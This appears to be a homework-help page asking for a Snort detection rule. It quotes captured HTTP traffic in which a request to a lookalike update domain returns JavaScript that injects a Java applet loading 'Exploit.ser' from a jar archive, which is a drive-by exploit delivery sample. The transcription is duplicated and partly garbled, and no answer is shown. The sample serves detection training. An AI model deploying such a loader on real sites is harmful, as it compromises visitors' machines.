[solved]-Create Snort Rule Explain Reasoning Everything Answer Q39050011

Create a snort rule for above.

EXPLAIN REASONING AND EVERYTHING FOR ANSWER

GET /updates/ HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/jpeg, application/x- ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept – Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3. 0. 30729; Media Center PC 6.0; InfoPath. 2) Accept-Encoding: gzip,deflate Host: windovy supdate.com Connection: keep-Alive HTTP/1.1 200 OK Content-Type: text/html Connection: keep-Alive Server: Apache Content-Length: 345 <html> <script language=”Javascript”> var _app = navigator.appName; if (_app == ‘Microsoft Internet Explorer’) { document.write(‘<applet archive=”OmZkv.jar” object=”Exploit. ser”></applet>’); } else { document.write(‘<embed object=”Exploit.ser” type=”application/x-java-applet;version=1.6″ archive=’n Tikim.jar”></embed>’); </script> </html> Show transcribed image text GET /updates/ HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/jpeg, application/x- ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept – Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3. 0. 30729; Media Center PC 6.0; InfoPath. 2) Accept-Encoding: gzip,deflate Host: windovy supdate.com Connection: keep-Alive HTTP/1.1 200 OK Content-Type: text/html Connection: keep-Alive Server: Apache Content-Length: 345 var _app = navigator.appName; if (_app == ‘Microsoft Internet Explorer’) { document.write(”); } else { document.write(”);

Expert Answer

---

Answer to Create a snort rule for above. EXPLAIN REASONING AND EVERYTHING FOR ANSWER… . . .